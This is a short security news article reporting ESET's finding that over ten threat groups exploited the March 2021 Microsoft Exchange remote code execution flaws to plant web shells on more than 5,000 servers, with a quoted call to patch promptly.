During the first week of March 2021, Microsoft released patches for Microsoft Exchange Server 2013, 2016, and 2019. It was addressing a pre-authentication remote code execution vulnerability chain, allowing attackers to take over reachable Exchange servers, without the need for any valid account credentials. ESET announced that they have detected web shells on more than 5,000 email servers.
5,000 servers in over 115 countries were flagged
ESET announced that shortly after the release of Microsoft’s patch, they noticed many more threat actors, including Toronto Team and Mikroceen, that is scanning and compromising Exchange servers. ESET also stated that almost all of these APT groups are interested in espionage.
According to ESET’s announcement, over 5,000 unique servers in over 115 countries where web shells were flagged. The company has identified more than 10 different threat actors that likely leveraged the recent Microsoft Exchange RCE in order to install implants on victims’ email servers. ESET also stated,
“Our ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release. It is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.
It is now clearly beyond prime time to patch all Exchange servers as soon as possible. Even those not directly exposed to the internet should be patched because an attacker with low, or unprivileged, access to your LAN can trivially exploit these vulnerabilities to raise their privileges while compromising an internal (and probably more sensitive) Exchange server, and then move laterally from it.”